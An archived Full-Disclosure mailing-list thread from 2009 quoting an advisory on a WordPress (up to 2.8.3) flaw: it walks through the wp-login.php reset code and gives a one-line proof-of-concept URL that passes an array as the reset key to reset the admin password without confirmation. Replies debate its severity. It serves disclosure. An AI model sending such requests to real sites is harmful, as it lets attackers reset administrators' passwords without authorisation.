[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password



I'm guessing your not a Wordpress administrator, Fabio. Nice find
Laurent, as usual.

On Mon, Aug 10, 2009 at 10:48 PM, laurent
gaffie<laurent.gaffie@xxxxxxxxx> wrote:
> Oh ok.
> Then, let's avoid that function.
> If it's useless to have a function who validate a reset passwd before
> resetting it, let's just avoid it smartass.
>
>
> 2009/8/10 Fabio N Sarmento [ Gmail ] <fabior2@xxxxxxxxx>
>>
>> There is no risk on this.
>> It's just a little flaw, it doesn't broke anything or put your admin
>> access in risk.
>>
>> :-P to me , this vulnerability is more "BUZZ" then real deal. LOL
>>
>> 2009/8/10 laurent gaffie <laurent.gaffie@xxxxxxxxx>
>>>
>>> Hi there,
>>>
>>> This wasn't tested on the 2.7* branch.
>>> It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as an
>>> Apache 2.2.12 module, on a linux env.
>>>
>>>
>>> Regards Laurent Gaffié
>>>
>>>
>>>
>>> 2009/8/10 Nicolas Valcárcel Scerpella <nicolas.valcarcel@xxxxxxxxxxxxx>
>>>>
>>>> I don't see the issue with wp 2.7.1
>>>>
>>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>>>
>>>> > Errata:
>>>> >
>>>> > "V. BUSINESS IMPACT
>>>> > -------------------------
>>>> > An attacker could exploit this vulnerability to compromise the admin
>>>> > account
>>>> > of any wordpress/wordpress-mu <= 2.8.3"
>>>> >
>>>> > -->
>>>> >
>>>> > "V. BUSINESS IMPACT
>>>> > -------------------------
>>>> > An attacker could exploit this vulnerability to reset the admin
>>>> > account of
>>>> > any wordpress/wordpress-mu <= 2.8.3"
>>>> >
>>>> >
>>>> > Regards Laurent Gaffié
>>>> >
>>>> >
>>>> > 2009/8/10 laurent gaffie <laurent.gaffie@xxxxxxxxx>
>>>> >
>>>> > > =============================================
>>>> > > - Release date: August 10th, 2009
>>>> > > - Discovered by: Laurent Gaffié
>>>> > > - Severity: Medium
>>>> > > =============================================
>>>> > >
>>>> > > I. VULNERABILITY
>>>> > > -------------------------
>>>> > > WordPress <= 2.8.3 Remote admin reset password
>>>> > >
>>>> > > II. BACKGROUND
>>>> > > -------------------------
>>>> > > WordPress is a state-of-the-art publishing platform with a focus on
>>>> > > aesthetics, web standards, and usability.
>>>> > > WordPress is both free and priceless at the same time.
>>>> > > More simply, WordPress is what you use when you want to work with
>>>> > > your
>>>> > > blogging software, not fight it.
>>>> > >
>>>> > > III. DESCRIPTION
>>>> > > -------------------------
>>>> > > The way Wordpress handle a password reset looks like this:
>>>> > > You submit your email adress or username via this form
>>>> > > /wp-login.php?action=lostpassword ;
>>>> > > Wordpress send you a reset confirmation like that via email:
>>>> > >
>>>> > > "
>>>> > > Someone has asked to reset the password for the following site and
>>>> > > username.
>>>> > > http://DOMAIN_NAME.TLD/wordpress
>>>> > > Username: admin
>>>> > > To reset your password visit the following address, otherwise just
>>>> > > ignore
>>>> > > this email and nothing will happen
>>>> > >
>>>> > >
>>>> > >
>>>> > > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>>> > > "
>>>> > >
>>>> > > You click on the link, and then Wordpress reset your admin password,
>>>> > > and
>>>> > > sends you over another email with your new credentials.
>>>> > >
>>>> > > Let's see how it works:
>>>> > >
>>>> > >
>>>> > > wp-login.php:
>>>> > > ...[snip]....
>>>> > > line 186:
>>>> > > function reset_password($key) {
>>>> > >     global $wpdb;
>>>> > >
>>>> > >     $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>>> > >
>>>> > >     if ( empty( $key ) )
>>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>>> > >
>>>> > >     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM
>>>> > > $wpdb->users WHERE
>>>> > > user_activation_key = %s", $key));
>>>> > >     if ( empty( $user ) )
>>>> > >         return new WP_Error('invalid_key', __('Invalid key'));
>>>> > > ...[snip]....
>>>> > > line 276:
>>>> > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] :
>>>> > > 'login';
>>>> > > $errors = new WP_Error();
>>>> > >
>>>> > > if ( isset($_GET['key']) )
>>>> > >     $action = 'resetpass';
>>>> > >
>>>> > > // validate action so as to default to the login screen
>>>> > > if ( !in_array($action, array('logout', 'lostpassword',
>>>> > > 'retrievepassword',
>>>> > > 'resetpass', 'rp', 'register', 'login')) && false ===
>>>> > > has_filter('login_form_' . $action) )
>>>> > >     $action = 'login';
>>>> > > ...[snip]....
>>>> > >
>>>> > > line 370:
>>>> > >
>>>> > > break;
>>>> > >
>>>> > > case 'resetpass' :
>>>> > > case 'rp' :
>>>> > >     $errors = reset_password($_GET['key']);
>>>> > >
>>>> > >     if ( ! is_wp_error($errors) ) {
>>>> > >         wp_redirect('wp-login.php?checkemail=newpass');
>>>> > >         exit();
>>>> > >     }
>>>> > >
>>>> > >
>>>> > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
>>>> > >     exit();
>>>> > >
>>>> > > break;
>>>> > > ...[snip ]...
>>>> > >
>>>> > > You can abuse the password reset function, and bypass the first step
>>>> > > and
>>>> > > then reset the admin password by submiting an array to the $key
>>>> > > variable.
>>>> > >
>>>> > >
>>>> > > IV. PROOF OF CONCEPT
>>>> > > -------------------------
>>>> > > A web browser is sufficiant to reproduce this Proof of concept:
>>>> > >
>>>> > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=>
>>>> > > The password will be reset without any confirmation.
>>>> > >
>>>> > > V. BUSINESS IMPACT
>>>> > > -------------------------
>>>> > > An attacker could exploit this vulnerability to compromise the admin
>>>> > > account of any wordpress/wordpress-mu <= 2.8.3
>>>> > >
>>>> > > VI. SYSTEMS AFFECTED
>>>> > > -------------------------
>>>> > > All
>>>> > >
>>>> > > VII. SOLUTION
>>>> > > -------------------------
>>>> > > No patch aviable for the moment.
>>>> > >
>>>> > > VIII. REFERENCES
>>>> > > -------------------------
>>>> > > http://www.wordpress.org
>>>> > >
>>>> > > IX. CREDITS
>>>> > > -------------------------
>>>> > > This vulnerability has been discovered by Laurent Gaffié
>>>> > > Laurent.gaffie{remove-this}(at)gmail.com
>>>> > > I'd like to shoot some greetz to securityreason.com for them great
>>>> > > research on PHP, as for this under-estimated vulnerability
>>>> > > discovered by
>>>> > > Maksymilian Arciemowicz :
>>>> > > http://securityreason.com/achievement_securityalert/38
>>>> > >
>>>> > > X. REVISION HISTORY
>>>> > > -------------------------
>>>> > > August 10th, 2009: Initial release
>>>> > >
>>>> > > XI. LEGAL NOTICES
>>>> > > -------------------------
>>>> > > The information contained within this advisory is supplied "as-is"
>>>> > > with no warranties or guarantees of fitness of use or otherwise.
>>>> > > I accept no responsibility for any damage caused by the use or
>>>> > > misuse of this information.
>>>> > >
>>>>
>>>> > _______________________________________________
>>>> > Full-Disclosure - We believe in it.
>>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>> --
>>>> Nicolas Valcárcel
>>>> Security Engineer
>>>> Custom Engineering Solutions Group
>>>> Canonical OEM Services
>>>> Mobile: +511 994 293 200
>>>> Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9  DD12 524E C3CD EF58 4970
>>>> gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE
>>>>
>>>> -----BEGIN PGP SIGNATURE-----
>>>> Version: GnuPG v1.4.9 (GNU/Linux)
>>>>
>>>> iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF
>>>> 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK
>>>> VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk
>>>> OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+
>>>> 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w
>>>> Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY=
>>>> =UdOl
>>>> -----END PGP SIGNATURE-----
>>>>
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>> --
>>
>> If you have questions please let me know.
>> Best regards,
>> - Fábio - IT Manager
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/